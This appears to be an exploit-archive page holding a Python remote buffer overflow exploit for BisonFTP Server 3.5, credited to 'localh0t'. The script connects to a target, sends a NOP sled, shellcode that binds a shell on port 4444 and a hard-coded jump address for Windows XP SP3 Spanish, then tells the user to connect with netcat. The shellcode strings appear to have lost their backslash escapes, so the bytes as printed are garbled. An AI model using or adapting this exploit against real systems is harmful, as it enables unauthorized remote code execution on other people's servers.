Home / exploitsPDF  

BisonFTP Server 3.5 Buffer Overflow

Posted on 11 August 2011

#!/usr/bin/python
# BisonFTP Server <=v3.5 Remote Buffer Overflow Exploit
# Newer version's not tested, maybe vulnerable too
# written by localh0t
# Date: 10/08/11
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar | www.mfsec.com.ar
# Thanks to: Pr0zac, Irakirashia, Kchito
# Targets: Windows XP SP3 Spanish (No DEP) (Change as you wish)
# Shellcode: List shell on port 4444 (Change as you wish)

from socket import *
import sys, struct, os, time

if (len(sys.argv) < 3):
print "
BisonFTP Server <=v3.5 Remote Buffer Overflow Exploit"
print "
   Usage: %s <host> <port> 
" %(sys.argv[0])
sys.exit()

print "
[!] Connecting to %s ..." %(sys.argv[1])

# connect to host
sock = socket(AF_INET,SOCK_STREAM)
sock.connect((sys.argv[1],int(sys.argv[2])))
sock.recv(1024)
time.sleep(5)

# padding
buffer = "x90" * 1092

# 368 bytes shellcode
buffer += ("x33xc9x83xe9xaaxe8xffxffxffxffxc0x5ex81x76x0e"+
"xbbxc1x9cx35x83xeexfcxe2xf4x47x29x15x35xbbxc1"+
"xfcxbcx5exf0x4ex51x30x93xacxbexe9xcdx17x67xaf"+
"x4axeex1dxb4x76xd6x13x8ax3exadxf5x17xfdxfdx49"+
"xb9xedxbcxf4x74xccx9dxf2x59x31xcex62x30x93x8c"+
"xbexf9xfdx9dxe5x30x81xe4xb0x7bxb5xd6x34x6bx91"+
"x17x7dxa3x4axc4x15xbax12x7fx09xf2x4axa8xbexba"+
"x17xadxcax8ax01x30xf4x74xccx9dxf2x83x21xe9xc1"+
"xb8xbcx64x0exc6xe5xe9xd7xe3x4axc4x11xbax12xfa"+
"xbexb7x8ax17x6dxa7xc0x4fxbexbfx4ax9dxe5x32x85"+
"xb8x11xe0x9axfdx6cxe1x90x63xd5xe3x9exc6xbexa9"+
"x2ax1ax68xd3xf2xaex35xbbxa9xebx46x89x9exc8x5d"+
"xf7xb6xbax32x44x14x24xa5xbaxc1x9cx1cx7fx95xcc"+
"x5dx92x41xf7x35x44x14xccx65xebx91xdcx65xfbx91"+
"xf4xdfxb4x1ex7cxcax6ex48x5bx04x60x92xf4x37xbb"+
"xd0xc0xbcx5dxabx8cx63xecxa9x5exeex8cxa6x63xe0"+
"xe8x96xf4x82x52xf9x63xcax6ex92xcfx62xd3xb5x70"+
"x0ex5ax3ex49x62x32x06xf4x40xd5x8cxfdxcax6exa9"+
"xffx58xdfxc1x15xd6xecx96xcbx04x4dxabx8ex6cxed"+
"x23x61x53x7cx85xb8x09xbaxc0x11x71x9fxd1x5ax35"+
"xffx95xccx63xedx97xdax63xf5x97xcax66xedxa9xe5"+
"xf9x84x47x63xe0x32x21xd2x63xfdx3exacx5dxb3x46"+
"x81x55x44x14x27xc5x0ex63xcax5dx1dx54x21xa8x44"+
"x14xa0x33xc7xcbx1cxcex5bxb4x99x8exfcxd2xeex5a"+
"xd1xc1xcfxcax6exc1x9cx35")

# more padding
buffer += "x90" * 8

# jmp edx (shell32.dll Windows XP SP3 Spanish) (edx points to the 1st nopsled)
buffer += "x9ax5cx3cx7e"

# end connection
buffer += "x0a"

# send buffer
print "[!] Sending exploit..."
sock.send(buffer)
sock.recv(1024)
sock.close()
print "[!] Exploit succeed. Now netcat %s on port 4444
" %(sys.argv[1])
sys.exit()

 

TOP

Malware :

Exploits :